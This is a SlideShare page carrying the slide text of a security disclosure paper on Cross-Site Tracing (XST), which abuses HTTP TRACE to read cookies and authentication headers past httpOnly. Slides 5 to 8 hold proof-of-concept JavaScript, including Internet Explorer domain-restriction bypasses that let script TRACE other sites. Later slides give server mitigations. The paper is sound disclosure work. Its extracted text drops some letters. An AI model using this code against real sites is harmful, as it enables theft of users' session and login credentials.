JavaScript Security: Mastering Cross Domain Communications in complex JS appl...JavaScript Security: Mastering Cross Domain Communications in complex JS appl...
JavaScript Security: Mastering Cross Domain Communications in complex JS appl...
 
Web 20 Security - Vordel
Web 20 Security - VordelWeb 20 Security - Vordel
Web 20 Security - Vordel
 
List of useful security related http headers
List of useful security related http headersList of useful security related http headers
List of useful security related http headers
 
Java Web Security Class
Java Web Security ClassJava Web Security Class
Java Web Security Class
 
XSS
XSSXSS
XSS
 

More from Magno Logan

DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
DevSecOps - Integrating Security in the Development Process (with memes) - Ma...DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
DevSecOps - Integrating Security in the Development Process (with memes) - Ma...Magno Logan
 
Katana Security - Consultoria em Segurança da Informação
Katana Security - Consultoria em Segurança da InformaçãoKatana Security - Consultoria em Segurança da Informação
Katana Security - Consultoria em Segurança da InformaçãoMagno Logan
 
OWASP Top 10 2010 para JavaEE (pt-BR)
OWASP Top 10 2010 para JavaEE (pt-BR)OWASP Top 10 2010 para JavaEE (pt-BR)
OWASP Top 10 2010 para JavaEE (pt-BR)Magno Logan
 
OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE Magno Logan
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection TutorialMagno Logan
 
OWASP Top 10 2010 pt-BR
OWASP Top 10 2010 pt-BROWASP Top 10 2010 pt-BR
OWASP Top 10 2010 pt-BRMagno Logan
 
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner EliasTratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner EliasMagno Logan
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMagno Logan
 
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...Magno Logan
 
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...Magno Logan
 
AppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
AppSec EU 2011 - An Introduction to ZAP by Simon BennettsAppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
AppSec EU 2011 - An Introduction to ZAP by Simon BennettsMagno Logan
 
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...Magno Logan
 
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...Magno Logan
 
AppSec DC 2009 - Learning by breaking by Chuck Willis
AppSec DC 2009 - Learning by breaking by Chuck WillisAppSec DC 2009 - Learning by breaking by Chuck Willis
AppSec DC 2009 - Learning by breaking by Chuck WillisMagno Logan
 
Just4Meeting 2012 - How to protect your web applications
Just4Meeting 2012 - How to protect your web applicationsJust4Meeting 2012 - How to protect your web applications
Just4Meeting 2012 - How to protect your web applicationsMagno Logan
 
GTS 17 - OWASP em prol de um mundo mais seguro
GTS 17 - OWASP em prol de um mundo mais seguroGTS 17 - OWASP em prol de um mundo mais seguro
GTS 17 - OWASP em prol de um mundo mais seguroMagno Logan
 
ENSOL 2011 - OWASP e a Segurança na Web
ENSOL 2011 - OWASP e a Segurança na WebENSOL 2011 - OWASP e a Segurança na Web
ENSOL 2011 - OWASP e a Segurança na WebMagno Logan
 
BHack 2012 - How to protect your web applications
BHack 2012 - How to protect your web applicationsBHack 2012 - How to protect your web applications
BHack 2012 - How to protect your web applicationsMagno Logan
 

More from Magno Logan (20)

DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
DevSecOps - Integrating Security in the Development Process (with memes) - Ma...DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
 
Katana Security - Consultoria em Segurança da Informação
Katana Security - Consultoria em Segurança da InformaçãoKatana Security - Consultoria em Segurança da Informação
Katana Security - Consultoria em Segurança da Informação
 
OWASP Top 10 2010 para JavaEE (pt-BR)
OWASP Top 10 2010 para JavaEE (pt-BR)OWASP Top 10 2010 para JavaEE (pt-BR)
OWASP Top 10 2010 para JavaEE (pt-BR)
 
OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE
 
XPath Injection
XPath InjectionXPath Injection
XPath Injection
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection Tutorial
 
OWASP Top 10 2010 pt-BR
OWASP Top 10 2010 pt-BROWASP Top 10 2010 pt-BR
OWASP Top 10 2010 pt-BR
 
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner EliasTratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
 
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
 
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
 
AppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
AppSec EU 2011 - An Introduction to ZAP by Simon BennettsAppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
AppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
 
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
 
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...
 
AppSec DC 2009 - Learning by breaking by Chuck Willis
AppSec DC 2009 - Learning by breaking by Chuck WillisAppSec DC 2009 - Learning by breaking by Chuck Willis
AppSec DC 2009 - Learning by breaking by Chuck Willis
 
Just4Meeting 2012 - How to protect your web applications
Just4Meeting 2012 - How to protect your web applicationsJust4Meeting 2012 - How to protect your web applications
Just4Meeting 2012 - How to protect your web applications
 
GTS 17 - OWASP em prol de um mundo mais seguro
GTS 17 - OWASP em prol de um mundo mais seguroGTS 17 - OWASP em prol de um mundo mais seguro
GTS 17 - OWASP em prol de um mundo mais seguro
 
ENSOL 2011 - OWASP e a Segurança na Web
ENSOL 2011 - OWASP e a Segurança na WebENSOL 2011 - OWASP e a Segurança na Web
ENSOL 2011 - OWASP e a Segurança na Web
 
BHack 2012 - How to protect your web applications
BHack 2012 - How to protect your web applicationsBHack 2012 - How to protect your web applications
BHack 2012 - How to protect your web applications
 

Recently uploaded

DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 

Recently uploaded (20)

DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 

XST - Cross Site Tracing

  • 1. CROSS-SITE TRACING (XST) THE NEW TECHNIQUES AND EMERGING THREATS TO BYPASS CURRENT WEB SECURITY MEASURES USING TRACE AND XSS. Jeremiah Grossman //
  • 2. Warranties and Disclaimers         “ ”     ,    , ,    ,     ,    ,  -.  , ..             ,   .      , .     ,         , ,        ,  ,      , , ,      ,              .         .        ;           .  , .    /    (), (), / ()    .
  • 3. Overview October 23 2002, Microso issued a press release describing a new browser/server based protective security measure within of internet explorer 6 sp1. is new feature, dubbed “httponly”, helps guard http cookies against xss (cross-site scripting) attack. WhiteHat Security, heavily focused on web application security research and technology, began to investigate the feature in order to determine what it meant to web security. First of all, anything that attempts to help prevent the xss plague on the web is a good thing. Most of us in the web application security field already know the great pains required to prevent the ever-present existence of xss issues. Aer much security review, I posted to bugtraq stating that the new httpOnly security feature, which is nicely effective for the intended purpose, is limited in xss protection scope. Limited in that the security feature only prohibits the exposure of cookie data through the “document.cookie” object. However, Microso has taken an excellent first step in the right direction to prevent xss as a whole. A week later into testing of httpOnly, WhiteHat staff discovered a new web security attack technique that is able not only to bypass the httpOnly mechanism present in i.e. 6 service pack 1, but in addition the ability to xss “just about” anything from “just about” anywhere. is technique allows client-side scripting languages, such as javascript, and possibly other client-side technologies like vbscript, flash, java, etc., the ability access http web authentication credentials, with the added bonus of achieving this result over ssl. is ability has never before been previously possible. ese new exposures will be explained with detail in the proceeding sections to illustrate the concepts.
  • 4. Background Information TRACE Request Method “Trace” is used simply as an input data echo mechanism for the http protocol. is request method is commonly used for debug and other connection analysis activities. e http trace request (containing request line, headers, post data), sent to a trace supporting web server, will respond to the client with the information contained in the request. Trace provides any easy to way to tell what an http client is sending and what the server is receiving. Apache, IIS, and iPlanet all support trace as defined by the HTTP/1.1 RFC and is currently enabled by default. Very few system administrators have disabled this request method either because the method posed no known risk, default settings were considered good enough or simply had no option to do so. e following is an example of a TRACE request: $ telnet foo.com 80 Trying 127.0.0.1... Connected to foo.bar. Escape character is ‘^]’. TRACE / HTTP/1.1 Host: foo.bar X-Header: test HTTP/1.1 200 OK Date: Mon, 02 Dec 2002 19:24:51 GMT Server: Apache/2.0.40 (Unix) Content-Type: message/http TRACE / HTTP/1.1 Host: foo.bar X-Header: test As shown in the example, the server responded with the information sent by the client to the server. What sites currently have TRACE enabled? • www.passport.com • www.yahoo.com • www.disney.com • www.securityfocus.com • www.redhat.com • www.go.com • www.theregister.co.uk • www.sun.com • www.oracle.com • www.ibm.com (Many other web sites) httpOnly Cookie Option httpOnly is a HTTP Cookie option used to inform the browser (IE 6 only until other browsers support httpOnly) not to allow scripting languages (JavaScript, VBScript, etc.) access to the “document.cookie” object (normal XSS attack target). e syntax of an httpOnly cookie is as follows:
  • 5. Set-Cookie: name=value; httpOnly Using JavaScript we can test the effectiveness of the feature. (Code tested in IE 6 SP1) <script type=”text/javascript”> <!-- function normalCookie() { document.cookie = “TheCookieName=CookieValue_httpOnly”; alert(document.cookie); } function httpOnlyCookie() { document.cookie = “TheCookieName=CookieValue_httpOnly; httpOnly”; alert(document.cookie); } //--> </script> <FORM> <INPUT TYPE=BUTTON OnClick=”normalCookie();” VALUE=’Display Normal Cookie’> <INPUT TYPE=BUTTON OnClick=”httpOnlyCookie();” VALUE=’Display HTTPONLY Cookie’> </FORM> Code Example 1. Screen Shot 1: aer pressing the “Display Normal Cookie” button. Screen Shot 2 : Aer pressing the “Display HTTPONLY Cookie’” button. By testing the above code, you can quickly see that when httpOnly setting is in use, the “document.cookie” function allows access to the object, but the string returns empty. is becomes a useful security enhancement for many web applications.
  • 6. Analysis e first challenge is to gain access to the cookie data string normally contained in “document.cookie” while httpOnly is in use. e idea became to identify where the data within “document.cookie” is located besides within, of course, “document.cookie”. is is where TRACE’s usefulness for our purposes becomes clear. TRACE will echo the information you send in the HTTP Request. is includes cookie and Web Authentication strings, since they are just simple HTTP headers themselves. However, it is not a simple process forcing Internet Explorer to send a TRACE request, even while first considering the use HTML Form (METHOD=POST). In fact, Internet Explorer does not support request methods other than GET or POST while using an HTML form. To resolve this limitation, we had to utilize extended client-side scripting technologies to create and send a specially formatted HTTP request to a target web server. Many technologies are capable of performing specially craed HTTP request. <script type=”text/javascript”> <!-- function sendTrace () { var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”); xmlHttp.open(“TRACE”, “http://foo.bar”,false); xmlHttp.send(); xmlDoc=xmlHttp.responseText; alert(xmlDoc); } //--> </script> <INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request”> Code Example 2. (Will need to change the URL in the code) Screen Shot 3: Results of the TRACE request response from the server. Note the cookie string contained and accessible by means other than “document.cookie”.
  • 7. e above code, using the ActiveX control XMLHTTP, will send a TRACE request to the target web server. e server will then echo, if it supports TRACE, the information sent within the HTTP request. Internet Explorer will send general browser headers by default that will be displayed via a resulting JavaScript alert window. If your browser happens to have a cookie from the target domain or is logged into the target web server using web authentication, you will be able to see your cookies and credentials present within the alert. is technique successfully grants the code ability bypass “httpOnly”, while accessing cookie data without the use of “document.cookie”. We now have the desired capability to pass sensitive credentials off-domain to a third-party. Also as stated in the overview, the ability to access web authentication credentials not before possible using client-side script. To restate, all the sensitive information is still accessible even over an SSL link. It is important to note two things at this point. e first is ability to do these types of request using a web browser is NOT limited to Internet Explorer. Other web browsers such as Mozilla/Netscape possess the ability as well. Specifically, TRACE requests have been achieved in Mozilla using XMLDOM object scripting. e second, XMLHTTP, is only one of several ActiveX controls and other technologies, which appear have this control over HTTP within a browser environment. ere is however at this point a limiting factor preventing wider a danger escalation. e TRACE connection made by the browser, will NOT be allowed by the browser, to connect to anything other than the domain hosting the actual script content. A foo.bar script domain will only be able to TRACE and connect to a foo.bar domain host. is is a browser implemented domain restriction security policy. e domain restriction policy helps prevent XSS and other similar attacks from occurring. is technical exploit limitation does prevent further abuse, however, this hurdle can be bypassed as well as shown below. To increase the exposure of the exploit, we are in need of a domain-restriction-bypass vulnerability within Internet Explorer (or web browser of choice). As it turns out, these issues are quite numerous and can be commonly found posted to public resource forums such as bugtraq. Recently and currently, there have been known unresolved issue with the IE Domain Restriction policies. ese un-patched Internet Explorer 6 flaws, allow the ability to bypass the domain restriction security policy, and increase the overall severity of the problem. is IE issue uses the “external” browser flaw in the caching mechanism. And was first identified by GreyMagic Security.
  • 8. <script type=”text/javascript”> <!-- function xssDomain() { var oWin=open(“blank.html”,”victim”,”width=500,height=400”); var oVuln=oWin.external; oWin.location.href=”http://foo.bar”; setTimeout( function () { oVuln.NavigateAndFind(‘javascript:xmlHttp=new ActiveXObject(“Microsoft.XMLHTTP”);xmlHttp.open(“TRACE”,”http://foo.bar”,false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(“Show all headers for foo.com including cookie without using document.cookie n” + xmlDoc);’,””,””); }, 2000 ); } //--> </script> <INPUT TYPE=BUTTON OnClick=”xssDomain();” VALUE=’TRACE XSS Domain’> Code Example 3. (Code will not work post the MS02-068 roll-up which resolves the issue). However a working code example (4) below, as of this writing, does function. URLs in the code will need to be changed to identify a target. <script type=”text/javascript”> function xssDomainTraceRequest(){ var exampleCode = “var xmlHttp = new ActiveXObject( ”Microsoft.XMLHTTP”);xmlHttp.open(”TRACE”,”http://foo.bar”,false) ;xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(xmlDoc);”; var target = “http://foo.bar”; cExampleCode = encodeURIComponent(exampleCode + ‘;top.close()’); var readyCode = ‘font-size:expression(execScript(decodeURIComponent(“’ + cExampleCode + ‘”)))’; showModalDialog(target, null, readyCode); } </script> <INPUT TYPE=BUTTON OnClick=”xssDomainTraceRequest()” VALUE=”Show Cookie Information Using TRACE”> Code Example 4. (Functional as of this writing) is IE issue uses a flaw within “showModalDialog”. Gathered from or Larholm on http://www.pivx.com/ e URLs in the code will need to be changed to identify a target.
  • 9. Screen Shot 4: Results of the TRACE request response from the server. Note the base64 authentication string contained and now accessible. ese scripts now have the ability to connect to any domain, access cookies, and web authentication information, while NOT utilizing document.cookie and/or being restricted by domain security policy. What does this mean for exposure scenarios? Read On.
  • 10. Exposure Scenarios We will outline a few exposure scenarios while using varying degrees of security assumptions. Attempting to organize the scenarios by level of risk severity. Defining some necessary technologies and acronyms to better understand exposure at several levels. Domain Restriction Bypass (DRB) e ability for a client-side script to bypass domain restriction security policy enabled within a web browser. HTTP Request Enabling Technology (HRET) Client-side technologies resident within a web browser, which allow for the creation and sending of specially formatted HTTP Requests. ese technologies may include, but not all confirmed, JavaScript, VBScript, Flash, Java, ActiveX, Jscript, Action Script, Shockwave, etc.. TRACE Method Support (TMS) A target web server that currently supports the TRACE request method. “Credentials” will include cookie data and web authentication credentials. Scenarios assume the following: A user visits a malicious web site or views malicious content hosted by a trusted source (message board, web mail, etc..) and loads code similar to code example 3 & 4. Scenario 1. (DRB, HRET, TMS) All the required insecurities are present in today’s environment. Code may access any and all of the user credentials from any domain that supports TRACE including bypass httpOnly. XSS “just about” anyone from “just about anywhere”. Scenario 2. (HRET, TMS) Code may access any and all of the user credentials from the “hosting code” domain including bypass httpOnly. Scenario 3. (DRB, HRET) User credentials from target domain are safe due to the server not supporting or disallowing TRACE. However, other security concerns beyond the scope of this paper are present. Scenario 4. (HRET) User credentials from target domain are safe due to the server not supporting or disallowing TRACE. No other security concerns beyond the scope of this paper persist.
  • 11. General Recommendations 1. Sufficiently patch all web browsers against known domain restriction bypass flaws. is is a more important part of security policy now more than ever. 2. Disable or disallow the TRACE Request method on production and development (unless needed) web servers. 3. Web server vendors should update their web server packages to disable TRACE by default. 4. Web server vendors should inform their users on how to disable or disallow TRACE on existing web servers. 5. ActiveX controls supporting arbitrary HTTP request should be marked unsafe for scripting by default. Other such technology vendors (Flash, Java, Shockwave, VBScript, etc..) should attempt to implement greater security mechanisms regarding disallowing unauthorized HTTP requests. 6. Users have the ability to disable all active scripting and increase the safety of their credentials. However, this may negatively impact the functionality of many web sites.
  • 12. Server Specific Recommendations (Resolutions should be confirmed by appropriate vendor) IIS • URL Scan Apache • Source Code Modification • Mod_Rewrite Module RewriteEngine onRewriteCond %{REQUEST_METHOD} ^TRACERewriteRule .* – [F] (ank you to Rain Forest Puppy) ** e Limit or LimitExcept directive in the httpd.conf file does not appear to be able to restrict TRACE. ** Netscape iPlanet (Procedures for removing unwanted Request Methods) cd ${IPLANET_ROOT} mkdir secure_lib cp bin/https/lib/libns-httpd40.so secure_lib cd secure_lib emacs libnc-httpd40.so e supported methods appear in lists like: HEAD^@GET^@PUT^@POST^@DELETE^ @TRACE^@OPTIONS^@MOVE^@INDEX^@MKDIR^@RMDIR • Find all occurrences of these lists and change the methods as required to be GET padded with spaces to match the length of the word. I.e. DELETE becomes ‘GET ‘ (three spaces) • edit the start script for the web server to protect and prepend the secure_lib at the front of the LD_LIBRARY_PATH. i.e. LD_LIBRARY_PATH=${IPLANET_ROOT}/secure_lib: <the rest of the line as it appears in the script> • re-start the web server and test it still works! (Many thanks to Alastair Davie and Robert Rodger.)
  • 13. References Some Answered Questions. Q: Does this affect only Internet Explorer? A: No, this new technique may affect all browser supporting HTTP Request Enabling Technologies (HRET). Q: Does this exploit technique require ActiveX? A: ActiveX is used in our examples, however research has shown other similar technologies posses the same abilities. Q: If I turn off Active Scripting, as a user, am I safe? A: You could be “safer” but not safe. As previously said, other technologies such as Flash and Java may still pose a threat even if Active Scripting is disabled. Q: As a web server administrator, if I disable TRACE are my users credentials safe? A: Yes, this appears to be the case. Users of your “domain” would be safe against this new technique since your web server no longer echoes sensitive information in TRACE requests. Q: Are my users credentials at risk even though my applications are not vulnerable to XSS at the application layer? A: Yes. e particular attack vector of this XSS issue targets the web server itself rather than the web application layer. Q: Why should I have to reconfigure my web server, this sounds like a browser client-side issue? A: e security of the web browsers in use should be indeed secured as well as the web server. However, if the web server itself is not configured to deny TRACE, then the security of the domain credentials will reside in the security of the web browser. Not a good idea.
